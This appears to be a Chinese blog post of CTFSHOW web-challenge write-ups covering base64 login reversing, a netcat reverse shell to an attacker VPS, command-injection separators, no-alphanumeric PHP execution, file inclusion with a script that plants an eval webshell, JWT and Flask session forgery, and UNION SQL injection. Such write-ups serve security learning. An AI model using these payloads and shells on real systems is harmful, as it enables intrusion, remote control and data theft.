【CTFSHOW】 web应用安全与防护
第一章
Base64编码隐藏
前端js代码中有登录逻辑,解码这个base64
## HTTP头注入
在使用前文获取的口令登录后显示:
所以更改User-Agent字段为指定的内容
## Base64多层嵌套解码
1
2
3
4
5
6
7
8
9
10
document.getElementById('loginForm').addEventListener('submit', function(e) {
const correctPassword = "SXpVRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU=";
function validatePassword(input) {
let encoded = btoa(input);
encoded = btoa(encoded + 'xH7jK').slice(3);
encoded = btoa(encoded.split('').reverse().join(''));
encoded = btoa('aB3' + encoded + 'qW9').substr(2);
return btoa(encoded) === correctPassword;
}
这个逻辑需要反推出input是什么,其中:
btoa()方法将str参数转为base64编码
slice(n)方法将字符串前n个字符去除
substr(n)方法将字符串前n个字符去除
按照以下脚本,能够确定口令为4-5位,且以7316结尾。
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
import base64
def atob(s):
return base64.b64decode(s).decode()
correct_password = "SXpWRlF4TTFVelJtdFNSazB3VTJ4U1UwNXFSWGRVVlZrOWNWYzU="
step_4_result_str = atob(correct_password)
# 第二步,还原被切掉的两个字符的前缀
step_3_result = None
for i in range(256):
for j in range(256):
prefix = chr(i) + chr(j)
full_b64_with_prefix = prefix + step_4_result_str
try:
full_decoded_bytes = base64.b64decode(full_b64_with_prefix)
full_decoded_str = full_decoded_bytes.decode('ascii')
# 检查是否能被 'aB3' 和 'qW9' 正确分割
if full_decoded_str.startswith('aB3') and full_decoded_str.endswith('qW9'):
# 提取中间部分
middle_part = full_decoded_str[3:-3] # len('aB3')=3, len('qW9')=3
step_3_result = middle_part
print(f"Found correct prefix for step 4: '{prefix}'")
break
except (base64.binascii.Error, UnicodeDecodeError):
# 如果解码失败,说明前缀不正确,继续下一个
continue
#结果是YU
step_3_result = atob(step_3_result)
step_3_result= step_3_result[::-1]
# 第四步,相同逻辑找到缺失的前3个字符
import string
for a in string.printable:
for b in string.printable:
for c in string.printable:
prefix = a+b+c
t = prefix + step_3_result
try:
s = base64.b64decode(t + '===').decode(errors='ignore')
if s.endswith('xH7jK'):
possible = s[:-5] # remove 'xH7jK'
original = base64.b64decode(possible).decode()
print("Recovered input:", original)
raise SystemExit
except Exception:
pass
然后爆破出口令是T17316
## HTTPS中间人攻击
这个真没接触过
题目是两个文件,一个pcap流量包,一个sslkey.log,当你使用 HTTPS(基于 TLS/SSL 的 HTTP)进行通信时,数据是加密的。为了在抓包工具中查看这些加密流量的明文内容(例如调试 Web 应用),你需要让抓包工具能够解密 TLS 流量。sslkey.log 文件就提供了这种能力:它记录了客户端或服务端在 TLS 握手过程中生成的“预主密钥”(pre-master secret)或“主密钥”(master secret),这些密钥可以被 Wireshark 等工具用来解密捕获的 TLS 数据包。
用wireshark打开流量包,然后配置密钥文件。
编辑->首选项->protocol->TLS
在TLS流量包中能找到flag
## Cookie伪造
得先猜出登录的弱口令,和ID一样。在登陆后会多一个名为role的cookie字段,将其改为admin即可。
# 第二章
## 一句话木马变形
首先ls可知目标文件,由于ls未定义所以触发warning将其处理为字符串
接下来的目标是只用数字、字母、下划线、小括号和丰号进行文件读取。
## 反弹shell构造
没有回显,但是可以写入文件
再者就用vps反弹shell
1
nc -lvnp 端口号1 #vps
1
nc -e /bin/bash vpsIP 端口号1 #靶机
## 管道符绕过过滤
这一题自带一个ls的执行。
不输入东西直接点击execute:
1
2
3
4
5
; //分号 都执行
| //只执行后面那条命令
|| //只执行前面那条命令
& //两条命令都会执行
&& //两条命令都会执行
## 无字母数字代码执行
工具: PHPFuck
取反绕过:
1
2
3
4
5
6
7
8
$system="system";
$command="tac flag.php";
echo '(~'.urlencode(~$system).')(~'.urlencode(~$command).');';
## 无字母数字命令执行
没整明白,似乎是取消了回显,写入文件无效果。官方wp是盲注
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
import requests
import time
url = "http://55a41bda-0fa9-44a2-a99e-cb52ed587f52.challenge.ctf.show/"
#payload.txt 内容为需要执行的命令 这里为 tac /var/www/html/flag.php
file = {"file": open("payload.txt", "r")}
data = {"code": ". /???/????????[@-[]"}
while True:
response = requests.post(url, files=file, data=data)
if response.text.find("CTF{")!= -1:
flag = response.text[response.text.find("CTF{"):-1]
print(flag)
break
else:
print("Waiting for flag...")
time.sleep(1)
# 第三章
## 日志文件包含
nginx系统包含日志文件:/var/log/nginx/access.log
## php://filter读取源码
php://filter/read=filter_name/resource=resource_name
* read=:指定要应用的读取过滤器(可以有多个,用 | 分隔)。
* resource=:指定要操作的资源,通常是文件路径(如 file.php)。
常见的过滤器包括:
* convert.base64-encode:将内容进行 base64 编码。
* convert.base64-decode:将内容进行 base64 解码(较少用)。
* string.rot13:ROT13 编码(仅用于演示)。
* string.toupper / string.tolower:转大写/小写。
* zlib.inflate / zlib.deflate:压缩/解压。
dirsearch存在两个文件db.php和index.php
读取db.php:
php://filter/read=convert.base64-encode/resource=db.php
## 远程文件包含(RFI)
不可访问日志文件,如下包含:
## 路径遍历突破
如下
前面的aa是个不存在的路径,然后返回上一层时会忽略掉这个不存在的路径名
## 临时文件包含
官方脚本:
1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
import requests
import threading
session=requests.session()
sess='ctfshow'
url="http://localhost:5055/"
data1={
'PHP_SESSION_UPLOAD_PROGRESS':'<?php echo "success";file_put_contents("/var/www/html/1.php","<?php eval(\\$_POST[1]);?>");?>'
}
file={
'file':'ctfshow'
}
cookies={
'PHPSESSID': sess
}
def write():
while True:
r = session.post(url,data=data1,files=file,cookies=cookies)
def read():
while True:
r = session.get(url+"?path=/tmp/sess_ctfshow",cookies=cookies)
if 'success' in r.text:
print("shell 地址为:"+url+"1.php")
exit()
threads = [threading.Thread(target=write),
threading.Thread(target=read)]
for t in threads:
t.start()
# 第四章
## Session固定攻击
好像是情景模拟题,有点不知所云,在“send to admin”链接发送自己的session id后,再用同样的sessionid刷新登录即可。
## JWT令牌伪造
JWT编解码
按照提示将alg改为none,将admin改为true,然后覆盖jwttoken刷新即可
## Flask_Session伪造
读取网页后会出现一个get参数,可以读取文件:
读取源码:
审计代码:
1. 首先获取密钥:
uuid.getnode()方法会寻找/sys/class/net/的接口获取MAC并换为整数输出。
读取/proc/net/dev获取当前的网络接口,有eth0和1,一个一个试,查看/sys/class/net/eth0/address得到02:42:ac:0c:05:1c,如下或如密钥:
1
2
3
4
5
import random
hex = '0242ac0c051c'
code = int(hex,16)
random.seed(code)
print(str(random.random()*100))#84.53518668337956
2. flask session伪造
工具
python flask_session_cookie_manager3.py encode -t "{'username':'admin'}" -s "84.53518668337956"
获取到token,替换,访问flag路由。
## 弱口令爆破
1 | document.getElementById('loginForm').addEventListener('submit', function(e) { |
1 | import base64 |
1 | nc -lvnp 端口号1 #vps |
1 | nc -e /bin/bash vpsIP 端口号1 #靶机 |
1 | ; //分号 都执行 |
1 |
|
1 | import requests |
1 |
|
1 | import random |
第五章
联合注入
1 | ?id=-1%20union%20select%201,2,group_concat(table_name)%20from%20information_schema.tables%20where%20table_schema=database(); //查询表名 |
本博客所有文章除特别声明外,均采用 CC BY-NC-SA 4.0 许可协议。转载请注明来源 西风的那一年!
相关推荐
2023-07-24
【打靶】Socnet
靶机下载地址:https://download.vulnhub.com/boredhackerblog/medium_socnet.ova 主机探测arp-scan -l nmap -sn 192.168.40.0/16 kali:192.168.40.148 靶机:192.168.40.149 开始时没能使用工具扫描到靶机ip,最后才发现是因为VMware默认采用了桥接模式而非NAT模式将其接入网络。 进一步信息收集1.端口、服务、操作系统探测nmap -sV -sC -O 192.168.40.149 目标开放了22、5000端口,在5000端口运行了一个由python2编写的http服务“Werkzeug”。在按照提示输入少于4字符长度的信息时会提示输入不够长 2.目录扫描dirsearch -u 192.168.40.149:5000 对5000端口进行目录扫描,发现一个/admin目录,访问,内有一个可执行python代码的入口。 尝试利用1.利用python来反弹shell先在kali监听5555端口: nc -lvnp...
2023-08-02
【打靶】AdmX_new
靶机地址:https://download.vulnhub.com/admx/AdmX_new.7z 信息搜集及主机发现主机发现nmap -sn 192.168.40.0/24 netdiscover -r 192.168.40.0/24 这里再记录一工具arping,相较于arp-scan它范围更广,配合简单的bash使用。 for i in $(seq 1 256);do sudo arping -c 1 192.168.40.$i;done kali:192.168.40.148 靶机:192.168.40.150 信息搜集靶机端口、服务、操作系统探测nmap -sV -p- -O 192.168.40.150 主机只开放了80端口,访问后为apache的默认配置界面。 目录爆破dirsearch -u 192.168.40.150:80 80端口下存在/wordpress...
2025-06-03
【CTFSHOW】 web入门-黑盒测试
web380 扫描目录后,存在page.php 这里存在一个id.php参数,可能是文件包含。get传入id=flag即可 web381 原来的page.php加入了一个包含文件的前缀。 在注释中存在一个不存在于常见目录名称的目录,访问之即可 web382访问上题的目录,发现一个登录界面。 简单注入即可 web383同382...
2024-07-22
【CTFSHOW】 web入门文件上传
web151前端验证文件格式,抓包改包。 web152说是后端提供了校验,但是抓包改包也可。 web153.user.ini实际上就是一个可以由用户“自定义”的php.ini 在其中添加如下选项可以包含一些文件: 1auto_prepend_file=01.png 若该目录下存在合法的php文档则会自动包含这个gif文件。恰好,本地是黑名单过滤。 首先通过前两题同样的方法将.user.ini文件上传,再直接上传改了后缀名的🐎。 web154黑名单过滤了上传文件中不能有php,但是大小写可以绕过,其他同上。 web155黑名单过滤,不区分大小写,但是可以用短标签 web156在之前的基础上过滤了中括号[] 用大括号代替之。 web157 158过滤了{} []= 直接写命令 123<? system("nl ../fl*")?> web159过滤了system...
2024-11-11
【CTFSHOW】 web入门-代码审计
web301系统是一个登录界面 源码中登陆界面中,用户名似乎存在注入点。 if(!strcasecmp($userpwd,$row['sds_password'])){ 这一行是密码与查询到结果相等即可。所以可以联合注入控制密码的值。 username:-1’ union select 1234# password:1234 web302修改了以上检查登录的那句 1if(!strcasecmp(sds_decode($userpwd),$row['sds_password'])){ 在fun.php提供了这个哈希函数 那就调用该方法: 1echo sds_decode("1234")#3cd76fc2201d6959a8c1c63dbd906ec7 username:-1’ union select...
2024-06-11
【CTFSHOW】 web入门-其他
仅作记录,从这里开始是因为这些题传get参数就行 12345678910111213141516<?php$url = 'http://username:password@hostname/path?arg=value#anchor';print_r(parse_url($url));echo parse_url($url, PHP_URL_PATH);?>结果----------------------------------------------------------------------------------------------------Array([scheme] => http[host] => hostname[user] => username[pass] => password[path] => /path[query] => arg=value[fragment] =>...
评论
